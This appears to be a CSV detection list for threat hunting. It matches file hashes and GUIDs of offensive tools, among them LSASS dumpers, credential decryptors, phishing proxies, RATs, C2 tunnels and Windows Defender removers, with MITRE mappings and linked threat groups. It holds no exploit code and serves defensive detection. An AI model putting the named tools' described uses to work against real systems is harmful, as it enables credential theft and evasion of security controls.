"*497aafd68507c783dbc1ce2074f2d4de8be022f635533d896ac18b5451e355f3*",".{0,1000}497aafd68507c783dbc1ce2074f2d4de8be022f635533d896ac18b5451e355f3.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","25992"
"*497CA37F-506C-46CD-9B8D-F9BB0DA34B95*",".{0,1000}497CA37F\-506C\-46CD\-9B8D\-F9BB0DA34B95.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","#GUIDproject","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","25993"
"*4980fe8b5f9539b07e8f8ab36c13672558741048872fb2d983adca48c567e193*",".{0,1000}4980fe8b5f9539b07e8f8ab36c13672558741048872fb2d983adca48c567e193.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25994"
"*498364537cd2ea03d847b0254255a4e8c2bddc8e27c9dbb901d38dc1f954d99a*",".{0,1000}498364537cd2ea03d847b0254255a4e8c2bddc8e27c9dbb901d38dc1f954d99a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25996"
"*4984f4ee968fc246b4df6e9d6552753a98e4762c8cc95cd9693ffa815479d8f7*",".{0,1000}4984f4ee968fc246b4df6e9d6552753a98e4762c8cc95cd9693ffa815479d8f7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25997"
"*49966f985d0d509cebebda87d56da72e6a94253adfb3252000dfff73fb207ff0*",".{0,1000}49966f985d0d509cebebda87d56da72e6a94253adfb3252000dfff73fb207ff0.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","#filehash","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","25999"
"*499aded3a5f4ad62112d592128c245a7f38d841475428df10b9dded5291fc926*",".{0,1000}499aded3a5f4ad62112d592128c245a7f38d841475428df10b9dded5291fc926.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","26000"
"*49a2c7f9b752b7592cb1726d5427c81cb54e4055ef8350226dbb46a32d8fd560*",".{0,1000}49a2c7f9b752b7592cb1726d5427c81cb54e4055ef8350226dbb46a32d8fd560.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","26002"
"*49a3e7cc6f7f1a31d5b77a8772ffdc6c25eb1ce35fa0c3de6e55149494496491*",".{0,1000}49a3e7cc6f7f1a31d5b77a8772ffdc6c25eb1ce35fa0c3de6e55149494496491.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26003"
"*49AD5F38-9E37-4967-9E84-FE19C7434ED7*",".{0,1000}49AD5F38\-9E37\-4967\-9E84\-FE19C7434ED7.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs -  detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","#GUIDproject","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","26006"
"*49bf39a5611a385ee3e498cb43bcbb7ece41b689edafc556f35826f538580d46*",".{0,1000}49bf39a5611a385ee3e498cb43bcbb7ece41b689edafc556f35826f538580d46.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26008"
"*49c0747721f7e7e5d776d23d83f705951595de8e63df7b7afb43824f4a3415f3*",".{0,1000}49c0747721f7e7e5d776d23d83f705951595de8e63df7b7afb43824f4a3415f3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26009"
"*49c1d5aafeb8e45567b93e3bdf9b229b467eca67d53f0c05a812a5089f6c46ab*",".{0,1000}49c1d5aafeb8e45567b93e3bdf9b229b467eca67d53f0c05a812a5089f6c46ab.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26010"
"*49c790c9a66b4c86711bbde3e558b4c026d68c251baa46ff14afd4c8e9c80bb8*",".{0,1000}49c790c9a66b4c86711bbde3e558b4c026d68c251baa46ff14afd4c8e9c80bb8.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26011"
"*49c9788a669f864351f347d5f13e34cab961a6bc88afe5f8a5e32e868a2fc81d*",".{0,1000}49c9788a669f864351f347d5f13e34cab961a6bc88afe5f8a5e32e868a2fc81d.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","26012"
"*49cf02eb8f76329b62378b8e9b0ae5abbe0312b9f2c3e068dbdf57f9474dfd8c*",".{0,1000}49cf02eb8f76329b62378b8e9b0ae5abbe0312b9f2c3e068dbdf57f9474dfd8c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26013"
"*49cf75f28e0c89a8fac346f1c794ff1bcc985c85f47f17e1ce77de5216eab525*",".{0,1000}49cf75f28e0c89a8fac346f1c794ff1bcc985c85f47f17e1ce77de5216eab525.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26014"
"*49df12075c49bb956291cd11b2c53626174b4128309ada438d5d5e49265866f9*",".{0,1000}49df12075c49bb956291cd11b2c53626174b4128309ada438d5d5e49265866f9.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","#filehash","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","26015"
"*49f487316920c28f546082c345a58fad4bd470507ddc74f34a2515110f193b7d*",".{0,1000}49f487316920c28f546082c345a58fad4bd470507ddc74f34a2515110f193b7d.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","26017"
"*4a0a4a3bf506b1e511eb78eddd1fef6c7d29a76668fda6286914b13c78cbdb19*",".{0,1000}4a0a4a3bf506b1e511eb78eddd1fef6c7d29a76668fda6286914b13c78cbdb19.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26020"
"*4a190816cd6f296571f8f457a82b950e510473884e1ebf0de0fa51ac6d8ba250*",".{0,1000}4a190816cd6f296571f8f457a82b950e510473884e1ebf0de0fa51ac6d8ba250.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","26024"
"*4a1e4478704d8ad1fbec9b3258f315028fedd0dfbf739508ab1438d42625cbef*",".{0,1000}4a1e4478704d8ad1fbec9b3258f315028fedd0dfbf739508ab1438d42625cbef.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26026"
"*4a25a09ed816e1c629945dbd33779ab714d82bebf661557864aa61562ed4298c*",".{0,1000}4a25a09ed816e1c629945dbd33779ab714d82bebf661557864aa61562ed4298c.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","26027"
"*4a284165c3aab4ccc0a6e97353d7bac85b1fcd7160d020eca7b18cd1608ba1a4*",".{0,1000}4a284165c3aab4ccc0a6e97353d7bac85b1fcd7160d020eca7b18cd1608ba1a4.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26028"
"*4a2cb5591a0c84383b2a476d27de2647ae1a88c1e60ba409a90049a132bebb73*",".{0,1000}4a2cb5591a0c84383b2a476d27de2647ae1a88c1e60ba409a90049a132bebb73.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","26029"
"*4a3192bb30ab0b91e3909e2b64b22ea7a262199c5edf5d2f54946dc5212bc7c5*",".{0,1000}4a3192bb30ab0b91e3909e2b64b22ea7a262199c5edf5d2f54946dc5212bc7c5.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","26032"
"*4a32296896ca13b64f5bc86c8213c0755510c352c44663054947f9ed2c5c0983*",".{0,1000}4a32296896ca13b64f5bc86c8213c0755510c352c44663054947f9ed2c5c0983.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26033"
"*4a4a016032aef2083d5ff676240cdff59697197314a4c66abcf696aa23126de7*",".{0,1000}4a4a016032aef2083d5ff676240cdff59697197314a4c66abcf696aa23126de7.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","26036"
"*4a4b9536d0dbd27943d838e78f76a05c360856cb4d99a22d27b4d08f20887482*",".{0,1000}4a4b9536d0dbd27943d838e78f76a05c360856cb4d99a22d27b4d08f20887482.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26037"
"*4a4dbfa07c6f4a72b6727c4a2ed8ef2899f61f724a9b5d142ab30b1c283a6db8*",".{0,1000}4a4dbfa07c6f4a72b6727c4a2ed8ef2899f61f724a9b5d142ab30b1c283a6db8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26038"
"*4a51b007c344a876a579fd81cbd8b10835afde379f145f823794d763707c63c9*",".{0,1000}4a51b007c344a876a579fd81cbd8b10835afde379f145f823794d763707c63c9.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26040"
"*4a559425f55fd91596a8ad4c4caba2c2078900678b61b5097aca0b4b12cac605*",".{0,1000}4a559425f55fd91596a8ad4c4caba2c2078900678b61b5097aca0b4b12cac605.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26041"
"*4A5A36539C52FB818E21404B336FC1936B4B5A6AFBB432CD9DB9672F2BAC1B73*",".{0,1000}4A5A36539C52FB818E21404B336FC1936B4B5A6AFBB432CD9DB9672F2BAC1B73.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","26043"
"*4a613d768611d513d39de2212129c8fe56b77c016b0818584a3ca3cfd6a9bcaf*",".{0,1000}4a613d768611d513d39de2212129c8fe56b77c016b0818584a3ca3cfd6a9bcaf.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","26044"
"*4a642afafcbd3d6f5b704b50ea54ef59b5dea78f679cd7f1513b8d81b8d93cbb*",".{0,1000}4a642afafcbd3d6f5b704b50ea54ef59b5dea78f679cd7f1513b8d81b8d93cbb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26046"
"*4a7242511d6678dc255d9f4651ea4ed2fec74f5293323c2ce6bb23956beb02a4*",".{0,1000}4a7242511d6678dc255d9f4651ea4ed2fec74f5293323c2ce6bb23956beb02a4.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","26047"
"*4a738ce94499ea3c39ff65328e513db7df9db009d6df5422331f30a09b688e31*",".{0,1000}4a738ce94499ea3c39ff65328e513db7df9db009d6df5422331f30a09b688e31.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26048"
"*4a84c293927779fba03f1947803557c22ba6ad4b10dcc9780827df5cdeafa2ed*",".{0,1000}4a84c293927779fba03f1947803557c22ba6ad4b10dcc9780827df5cdeafa2ed.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26049"
"*4a852249475372d387ac1ba1c5ccd8b541dac4d89fb4ec51877cad81024a0c08*",".{0,1000}4a852249475372d387ac1ba1c5ccd8b541dac4d89fb4ec51877cad81024a0c08.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","26050"
"*4a8cf21bf284a3a1b2e17abf51ac94f47ba5595676a56d4fe9b276054528e4e8*",".{0,1000}4a8cf21bf284a3a1b2e17abf51ac94f47ba5595676a56d4fe9b276054528e4e8.{0,1000}","offensive_tool_keyword","Dispossessor","socks tools used by the ransomware group Dispossessor","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","26051"
"*4a8e184ca9e1ccc775b224a48d344ce13dde26a86a634df2853ce7a27c17765c*",".{0,1000}4a8e184ca9e1ccc775b224a48d344ce13dde26a86a634df2853ce7a27c17765c.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","#filehash","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","26052"
"*4a9652d48155a187a4c87e8d243f3b2514879927e9b8d56bd17e9b1c0d50da4b*",".{0,1000}4a9652d48155a187a4c87e8d243f3b2514879927e9b8d56bd17e9b1c0d50da4b.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","26053"
"*4a96ba27c260b02607556b05e93f631af307a6046a79936e8e229ecd84f12b7f*",".{0,1000}4a96ba27c260b02607556b05e93f631af307a6046a79936e8e229ecd84f12b7f.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","26054"
"*4a9d528dc102560378cff97262caeae12e24e64b94e381e6e5709e3b2bb89291*",".{0,1000}4a9d528dc102560378cff97262caeae12e24e64b94e381e6e5709e3b2bb89291.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","26056"
"*4a9dc2a031cf05b8ba61fde0462db7942194297b4e763e9d85c57d99746a242f*",".{0,1000}4a9dc2a031cf05b8ba61fde0462db7942194297b4e763e9d85c57d99746a242f.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","26057"
"*4aa1f8595b2334131d7349d8e60ed3d0bfe9c72abd053d42b6e74111b4e010eb*",".{0,1000}4aa1f8595b2334131d7349d8e60ed3d0bfe9c72abd053d42b6e74111b4e010eb.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#filehash","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","26058"
"*4aa27ae37edfbfe57f3ab989d192caf21b3c871516958eb77205c9ad700c3f67*",".{0,1000}4aa27ae37edfbfe57f3ab989d192caf21b3c871516958eb77205c9ad700c3f67.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","26059"
"*4aa7737009a9f06b9f4957c4fc12932ae0cd2039471d2ae4e5d4666ffeb40a2e*",".{0,1000}4aa7737009a9f06b9f4957c4fc12932ae0cd2039471d2ae4e5d4666ffeb40a2e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26062"
"*4aa99dcaf5030b1c4c7c57edd0fea22ab6db79caff79a547cc07572077631646*",".{0,1000}4aa99dcaf5030b1c4c7c57edd0fea22ab6db79caff79a547cc07572077631646.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","0","#filehash","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","26063"
